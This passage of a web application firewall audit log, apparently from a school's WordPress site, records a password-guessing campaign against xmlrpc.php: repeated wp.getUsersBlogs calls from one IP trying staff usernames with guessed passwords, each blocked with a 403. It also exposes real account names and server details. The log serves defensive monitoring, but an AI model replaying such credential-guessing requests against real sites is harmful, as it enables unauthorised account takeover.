[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776895481434 4182 (- - -) Stopwatch2: 1744776895481434 4182; combined=3224, p1=355, p2=2665, p3=0, p4=0, p5=121, sr=79, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c74e644-Z-- --4192fa78-A-- [16/Apr/2025:11:15:55 +0700] Z_8u-ype92T0H9-Aa0y48QAAAEA 103.236.140.4 56000 103.236.140.4 8181 --4192fa78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4192fa78-C-- wp.getUsersBlogs wakahumas Admin@321 --4192fa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4192fa78-E-- --4192fa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776955021808 4318 (- - -) Stopwatch2: 1744776955021808 4318; combined=3305, p1=363, p2=2774, p3=0, p4=0, p5=98, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4192fa78-Z-- --fabe2510-A-- [16/Apr/2025:11:16:55 +0700] Z_8vN0-sESiKFppgz04ZiQAAAMU 103.236.140.4 56304 103.236.140.4 8181 --fabe2510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fabe2510-C-- wp.getUsersBlogs wakahumas 2010 --fabe2510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fabe2510-E-- --fabe2510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777015375108 4121 (- - -) Stopwatch2: 1744777015375108 4121; combined=3178, p1=354, p2=2659, p3=0, p4=0, p5=97, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fabe2510-Z-- --fdc08b77-A-- [16/Apr/2025:11:17:55 +0700] Z_8vc5VnVduWmh0dMDMUCwAAAII 103.236.140.4 56632 103.236.140.4 8181 --fdc08b77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fdc08b77-C-- wp.getUsersBlogs wakahumas qqqqq --fdc08b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdc08b77-E-- --fdc08b77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777075088697 4197 (- - -) Stopwatch2: 1744777075088697 4197; combined=3219, p1=344, p2=2713, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdc08b77-Z-- --d1fc2e39-A-- [16/Apr/2025:11:18:15 +0700] Z_8vhxk9XPLR9cFiTEu-jgAAABI 103.236.140.4 56732 103.236.140.4 8181 --d1fc2e39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d1fc2e39-C-- wp.getUsersBlogs wakahumas 1234%^&* --d1fc2e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1fc2e39-E-- --d1fc2e39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777095173467 4381 (- - -) Stopwatch2: 1744777095173467 4381; combined=3330, p1=354, p2=2811, p3=0, p4=0, p5=98, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1fc2e39-Z-- --af5fd814-A-- [16/Apr/2025:11:18:55 +0700] Z_8vrxk9XPLR9cFiTEu-6wAAAAk 103.236.140.4 56938 103.236.140.4 8181 --af5fd814-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af5fd814-C-- wp.getUsersBlogs wakahumas superman --af5fd814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af5fd814-E-- --af5fd814-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777135271789 3988 (- - -) Stopwatch2: 1744777135271789 3988; combined=3036, p1=351, p2=2519, p3=0, p4=0, p5=95, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af5fd814-Z-- --cd6c6951-A-- [16/Apr/2025:11:19:55 +0700] Z_8v6ype92T0H9-Aa0y5kwAAAFM 103.236.140.4 57254 103.236.140.4 8181 --cd6c6951-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd6c6951-C-- wp.getUsersBlogs wakahumas 99999999 --cd6c6951-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd6c6951-E-- --cd6c6951-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777195220946 4236 (- - -) Stopwatch2: 1744777195220946 4236; combined=3276, p1=372, p2=2738, p3=0, p4=0, p5=97, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd6c6951-Z-- --23c42a33-A-- [16/Apr/2025:11:20:55 +0700] Z_8wJype92T0H9-Aa0y5tAAAAEU 103.236.140.4 57562 103.236.140.4 8181 --23c42a33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --23c42a33-C-- wp.getUsersBlogs wakahumas 1234567891 --23c42a33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23c42a33-E-- --23c42a33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777255228205 4419 (- - -) Stopwatch2: 1744777255228205 4419; combined=3503, p1=384, p2=2837, p3=0, p4=0, p5=155, sr=82, sw=127, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23c42a33-Z-- --93d99553-A-- [16/Apr/2025:11:21:55 +0700] Z_8wYxk9XPLR9cFiTEu_1AAAAAc 103.236.140.4 57902 103.236.140.4 8181 --93d99553-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --93d99553-C-- wp.getUsersBlogs wakasarpras Marketing2011 --93d99553-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d99553-E-- --93d99553-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777315265269 4225 (- - -) Stopwatch2: 1744777315265269 4225; combined=3245, p1=352, p2=2724, p3=0, p4=0, p5=98, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d99553-Z-- --d36b4751-A-- [16/Apr/2025:11:22:55 +0700] Z_8wnxk9XPLR9cFiTEvAKgAAABQ 103.236.140.4 58224 103.236.140.4 8181 --d36b4751-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d36b4751-C-- wp.getUsersBlogs wakasarpras Admin!@# --d36b4751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d36b4751-E-- --d36b4751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777375350298 4303 (- - -) Stopwatch2: 1744777375350298 4303; combined=3262, p1=359, p2=2724, p3=0, p4=0, p5=110, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d36b4751-Z-- --9403941e-A-- [16/Apr/2025:11:23:55 +0700] Z_8w2xk9XPLR9cFiTEvAjgAAABY 103.236.140.4 58538 103.236.140.4 8181 --9403941e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9403941e-C-- wp.getUsersBlogs wakasarpras customer --9403941e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9403941e-E-- --9403941e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777435263704 4618 (- - -) Stopwatch2: 1744777435263704 4618; combined=3509, p1=348, p2=2905, p3=0, p4=0, p5=147, sr=79, sw=109, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9403941e-Z-- --37e14a01-A-- [16/Apr/2025:11:24:51 +0700] Z_8xEype92T0H9-Aa0y6NQAAAEw 103.236.140.4 58810 103.236.140.4 8181 --37e14a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --37e14a01-C-- wp.getUsersBlogs wakasarpras 1234%^&* --37e14a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e14a01-E-- --37e14a01-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777491639233 5501 (- - -) Stopwatch2: 1744777491639233 5501; combined=3854, p1=455, p2=3219, p3=0, p4=0, p5=109, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e14a01-Z-- --c3e36413-A-- [16/Apr/2025:11:24:55 +0700] Z_8xF5VnVduWmh0dMDMUaAAAAJg 103.236.140.4 58884 103.236.140.4 8181 --c3e36413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3e36413-C-- wp.getUsersBlogs wakasarpras qazxsw --c3e36413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3e36413-E-- --c3e36413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777495134879 4925 (- - -) Stopwatch2: 1744777495134879 4925; combined=3459, p1=326, p2=2947, p3=0, p4=0, p5=108, sr=68, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3e36413-Z-- --adfbd541-A-- [16/Apr/2025:11:25:55 +0700] Z_8xUxk9XPLR9cFiTEvB8QAAAAA 103.236.140.4 60858 103.236.140.4 8181 --adfbd541-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --adfbd541-C-- wp.getUsersBlogs wakasarpras junior --adfbd541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adfbd541-E-- --adfbd541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777555097125 5317 (- - -) Stopwatch2: 1744777555097125 5317; combined=3858, p1=506, p2=3117, p3=0, p4=0, p5=138, sr=89, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adfbd541-Z-- --e181c733-A-- [16/Apr/2025:11:26:55 +0700] Z_8xj5VnVduWmh0dMDMVUQAAAIQ 103.236.140.4 34552 103.236.140.4 8181 --e181c733-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e181c733-C-- wp.getUsersBlogs wakasarpras tottenham --e181c733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e181c733-E-- --e181c733-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777615097271 5299 (- - -) Stopwatch2: 1744777615097271 5299; combined=3786, p1=470, p2=3106, p3=0, p4=0, p5=121, sr=89, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e181c733-Z-- --514e7a0e-A-- [16/Apr/2025:11:27:55 +0700] Z_8xyxk9XPLR9cFiTEvC6QAAAAI 103.236.140.4 36138 103.236.140.4 8181 --514e7a0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --514e7a0e-C-- wp.getUsersBlogs kasubagtu kasubagtu2000 --514e7a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514e7a0e-E-- --514e7a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777675105836 4734 (- - -) Stopwatch2: 1744777675105836 4734; combined=3743, p1=455, p2=3069, p3=0, p4=0, p5=124, sr=85, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514e7a0e-Z-- --6e296762-A-- [16/Apr/2025:11:28:55 